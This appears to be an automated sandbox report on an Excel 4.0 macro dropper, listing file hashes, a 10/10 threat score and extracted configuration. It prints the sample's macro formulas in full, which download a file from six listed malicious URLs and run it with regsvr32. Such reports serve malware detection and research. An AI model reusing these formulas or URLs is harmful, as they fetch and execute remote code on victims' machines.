General

  • Target

    a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

  • Size

    48KB

  • Sample

    241120-dg7e5stpgj

  • MD5

    74f3ea32b06ea2f4718dfa817dae7d84

  • SHA1

    343777fac4b631c68172990fe90953e65d403993

  • SHA256

    a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

  • SHA512

    0382262e8dfcd314008ec9a9f64349e0a6c7e71d8aa2e858ce4901281b9ee4cba81f7e1cb5d2d597969b5bc4b40db64568e5c2ec485e32e20ffe14ef086eff2d

  • SSDEEP

    768:Y2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:vuTlbMKDNck01u/R2rZyjB+5

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/

http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/

https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/

http://1000paginas.com/tienda/vWtT/

http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0)
    =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0))
    =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0))
    =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0))
    =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0))
    =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0))
    =IF('LGGDGB'!E21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx")
    =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://henrysfreshroast.com/OevI7Yy0i6YShxFl/

Targets

    • Target

      a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

    • Size

      48KB

    • MD5

      74f3ea32b06ea2f4718dfa817dae7d84

    • SHA1

      343777fac4b631c68172990fe90953e65d403993

    • SHA256

      a325a62583065b07d4471f068e9c23e0f2f8c40bd3c996687e4e93674e7e44f0

    • SHA512

      0382262e8dfcd314008ec9a9f64349e0a6c7e71d8aa2e858ce4901281b9ee4cba81f7e1cb5d2d597969b5bc4b40db64568e5c2ec485e32e20ffe14ef086eff2d

    • SSDEEP

      768:Y2uCkFF/vxRhR0KDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0BAR5:vuTlbMKDNck01u/R2rZyjB+5

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15
